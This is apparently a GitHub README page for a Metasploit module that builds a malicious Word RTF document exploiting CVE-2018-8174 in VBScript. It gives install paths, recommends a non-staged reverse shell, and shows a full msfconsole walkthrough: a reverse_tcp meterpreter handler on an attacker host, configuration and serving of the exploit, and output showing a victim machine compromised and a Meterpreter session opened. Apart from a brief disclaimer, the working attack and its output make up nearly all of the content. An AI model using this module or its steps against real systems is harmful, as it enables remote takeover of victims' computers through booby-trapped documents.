CVE-2018-8174-msf

This is a metasploit module which creates a malicious word document to exploit CVE-2018-8174 - VBScript memory corruption vulnerability.

This module is a very quick port and uses the exploit sample that was found in the wild. The exploit works only for Microsoft Office 32-bit.

There are a lot of things that need to get better at this module but I will update it in the future if I find some time.

Installation

Copy the CVE-2018-8174.rb to /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
Copy the CVE-2018-8174.rtf to /usr/share/metasploit-framework/data/exploits/

The exploit doesn't work very well with meterpreter shellcode so it's better to use non-staged reverse shell.

Disclaimer

DO NOT USE THIS SOFTWARE FOR ILLEGALL PURPOSES.

THE AUTHOR DOES NOT KEEP ANY RESPONSIBILITY FOR ANY MISUSE OF THE CODE PROVIDED HERE.

How To Use In Msf?

0x01 Download CVE-2018-8174 To Kali Linux

root@kali:~# updatedb
root@kali:~# locate CVE-2018-8174.rb
/opt/metasploit-framework/embedded/framework/modules/exploits/windows/fileformat/CVE-2018-8174.rb
root@kali:~# locate CVE-2018-8174.rtf
/opt/metasploit-framework/embedded/framework/data/exploits/CVE-2018-8174.rtf

0x02 listent port

root@kali:~# msfconsole                                                                                                                          
find: unknown predicate `-y'                                                                                                                     
                                                                                                                                                 
                                                                                                                                                 
 ______________________________________________________________________________                                                                  
|                                                                              |                                                                 
|                          3Kom SuperHack II Logon                             |                                                                 
|______________________________________________________________________________|                                                                 
|                                                                              |                                                                 
|                                                                              |                                                                 
|                                                                              |                                                                 
|                 User Name:          [   security    ]                        |                                                                 
|                                                                              |                                                                 
|                 Password:           [               ]                        |                                                                 
|                                                                              |                                                                 
|                                                                              |                                                                 
|                                                                              |                                                                 
|                                   [ OK ]                                     |                                                                 
|______________________________________________________________________________|                                                                 
|                                                                              |                                                                 
|                                                       https://metasploit.com |                                                                 
|______________________________________________________________________________|                                                                 
                                                                                                                                                 
                                                                                                                                                 
       =[ metasploit v4.16.50-dev-                        ]                                                                                      
+ -- --=[ 1752 exploits - 1003 auxiliary - 304 post       ]                                                                                      
+ -- --=[ 536 payloads - 40 encoders - 10 nops            ]                                                                                      
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]                                                                                      
                                                                                                                                                 
msf > use exploit/multi/ha                                                                                                                       
use exploit/multi/hams/steamed  use exploit/multi/handler                                                                                        
msf > use exploit/multi/ha                                                                                                                       
use exploit/multi/hams/steamed  use exploit/multi/handler                                                                                        
msf > use exploit/multi/handler                                                                                                                  
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp                                                                         
payload => windows/meterpreter/reverse_tcp                                                                                                       
msf exploit(multi/handler) > show options                                                                                                        
                                                                                                                                                 
Module options (exploit/multi/handler):                                                                                                          
                                                                                                                                                 
   Name  Current Setting  Required  Description                                                                                                  
   ----  ---------------  --------  -----------                                                                                                  
                                                                                                                                                 
                                                                                                                                                 
Payload options (windows/meterpreter/reverse_tcp):                                                                                               
                                                                                                                                                 
   Name      Current Setting  Required  Description                                                                                              
   ----      ---------------  --------  -----------                                                                                              
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)                                                
   LHOST                      yes       The listen address                                                                                       
   LPORT     4444             yes       The listen port                                                                                          
                                                                                                                                                 
                                                                                                                                                 
Exploit target:                                                                                                                                  
                                                                                                                                                 
   Id  Name                                                                                                                                      
   --  ----                                                                                                                                      
   0   Wildcard Target                                                                                                                           
                                                                                                                                                 
                                                                                                                                                 
msf exploit(multi/handler) > set lhost 10.10.10.103                                                                                              
lhost => 10.10.10.103                                                                                                                            
msf exploit(multi/handler) > show options                                                                                                        
                                                                                                                                                 
Module options (exploit/multi/handler):                                                                                                          
                                                                                                                                                 
   Name  Current Setting  Required  Description                                                                                                  
   ----  ---------------  --------  -----------                                                                                                  
                                                                                                                                                 
                                                                                                                                                 
Payload options (windows/meterpreter/reverse_tcp):                                                                                               
                                                                                                                                                 
   Name      Current Setting  Required  Description                                                                                              
   ----      ---------------  --------  -----------                                                                                              
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)                                                
   LHOST     10.10.10.103     yes       The listen address                                                                                       
   LPORT     4444             yes       The listen port                                                                                          
                                                                                                                                                 
                                                                                                                                                 
Exploit target:                                                                                                                                  
                                                                                                                                                 
   Id  Name                                                                                                                                      
   --  ----                                                                                                                                      
   0   Wildcard Target                                                                                                                           
                                                                                                                                                 
                                                                                                                                                 
msf exploit(multi/handler) > run -j                                                                                                              
[*] Exploit running as background job 0.                                                                                                         
                                                                                                                                                 
[*] Started reverse TCP handler on 10.10.10.103:4444                                                                                             
msf exploit(multi/handler) > netstat -ntpl                                                                                                       
[*] exec: netstat -ntpl                                                                                                                          
                                                                                                                                                 
Active Internet connections (only servers)                                                                                                       
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name                                                 
tcp        0      0 127.0.0.1:5432          0.0.0.0:*               LISTEN      726/postgres                                                     
tcp        0      0 10.10.10.103:4444       0.0.0.0:*               LISTEN      18651/ruby                                                       
tcp        0      0 0.0.0.0:3391            0.0.0.0:*               LISTEN      697/sshd                                                         
tcp6       0      0 :::80                   :::*                    LISTEN      422/apache2                                                      
tcp6       0      0 ::1:3350                :::*                    LISTEN      699/xrdp-sesman                                                  
tcp6       0      0 ::1:5432                :::*                    LISTEN      726/postgres                                                     
tcp6       0      0 :::3389                 :::*                    LISTEN      747/xrdp                                                         
tcp6       0      0 :::3391                 :::*                    LISTEN      697/sshd

0x03 use CVE-2018-8174-msf

msf exploit(multi/handler) > use exploit/windows/fileformat/CVE-2018-8174                                                                             
msf exploit(windows/fileformat/CVE-2018-8174) > show options                                                                                          
                                                                                                                                                      
Module options (exploit/windows/fileformat/CVE-2018-8174):                                                                                            
                                                                                                                                                      
   Name      Current Setting  Required  Description                                                                                                   
   ----      ---------------  --------  -----------                                                                                                   
   FILENAME  msf.rtf          yes       The file name.                                                                                                
   SRVHOST   0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0                          
   SRVPORT   8080             yes       The local port to listen on.                                                                                  
   SSL       false            no        Negotiate SSL for incoming connections                                                                        
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)                                              
   URIPATH   /                yes       The URI path to use                                                                                           
                                                                                                                                                      
                                                                                                                                                      
Exploit target:                                                                                                                                       
                                                                                                                                                      
   Id  Name                                                                                                                                           
   --  ----                                                                                                                                           
   0   Microsoft Office Word 32-bit                                                                                                                   
                                                                                                                                                      
                                                                                                                                                      
msf exploit(windows/fileformat/CVE-2018-8174) > set srvhost 10.10.10.103                                                                              
srvhost => 10.10.10.103                                                                                                                               
msf exploit(windows/fileformat/CVE-2018-8174) > set uri                                                                                               
set urihost  set uripath  set uriport                                                                                                                 
msf exploit(windows/fileformat/CVE-2018-8174) > set urip                                                                                              
set uripath  set uriport                                                                                                                              
msf exploit(windows/fileformat/CVE-2018-8174) > set uripath /exploit                                                                                  
uripath => /exploit                                                                                                                                   
msf exploit(windows/fileformat/CVE-2018-8174) > show options                                                                                          
                                                                                                                                                      
Module options (exploit/windows/fileformat/CVE-2018-8174):                                                                                            
                                                                                                                                                      
   Name      Current Setting  Required  Description                                                                                                   
   ----      ---------------  --------  -----------                                                                                                   
   FILENAME  msf.rtf          yes       The file name.                                                                                                
   SRVHOST   10.10.10.103     yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0                          
   SRVPORT   8080             yes       The local port to listen on.                                                                                  
   SSL       false            no        Negotiate SSL for incoming connections                                                                        
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)                                              
   URIPATH   /exploit         yes       The URI path to use                                                                                           
                                                                                                                                                      
                                                                                                                                                      
Exploit target:                                                                                                                                       
                                                                                                                                                      
   Id  Name                                                                                                                                           
   --  ----                                                                                                                                           
   0   Microsoft Office Word 32-bit                                                                                                                   
                                                                                                                                                      
                                                                                                                                                      
msf exploit(windows/fileformat/CVE-2018-8174) > run                                                                                                   
[*] Exploit running as background job 1.                                                                                                              
msf exploit(windows/fileformat/CVE-2018-8174) >                                                                                                       
[+] msf.rtf stored at /root/.msf4/local/msf.rtf                                                                                                       
[*] Using URL: http://10.10.10.103:8080/exploit                                                                                                       
[*] Server started.                                                                                                                                   
[*] 10.10.10.106     CVE-2018-8174 - Delivering Exploit                                                                                               
[*] Sending stage (179779 bytes) to 10.10.10.106                                                                                                      
[*] Meterpreter session 1 opened (10.10.10.103:4444 -> 10.10.10.106:49318) at 2018-06-21 22:00:09 -0400                                               
                                                                                                                                                      
msf exploit(windows/fileformat/CVE-2018-8174) > sessions                                                                                              
                                                                                                                                                      
Active sessions                                                                                                                                       
===============                                                                                                                                       
                                                                                                                                                      
  Id  Name  Type                     Information                   Connection                                                                         
  --  ----  ----                     -----------                   ----------                                                                         
  1         meterpreter x86/windows  CTF-PC\shaoyu @ CTF-PC  10.10.10.103:4444 -> 10.10.10.106:49318 (10.10.10.106)                             
                                                                                                                                                      
msf exploit(windows/fileformat/CVE-2018-8174) >

0x09al / cve-2018-8174-msf Goto Github PK

cve-2018-8174-msf's Introduction

CVE-2018-8174-msf

Installation

Disclaimer

cve-2018-8174-msf's People

Contributors

Stargazers

Watchers

Forkers

cve-2018-8174-msf's Issues

cann't reserve shell

How To Use In Msf?

0x01 Download CVE-2018-8174 To Kali Linux

0x02 listent port

0x03 use CVE-2018-8174-msf

No conversation?

Port it to plain ruby

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent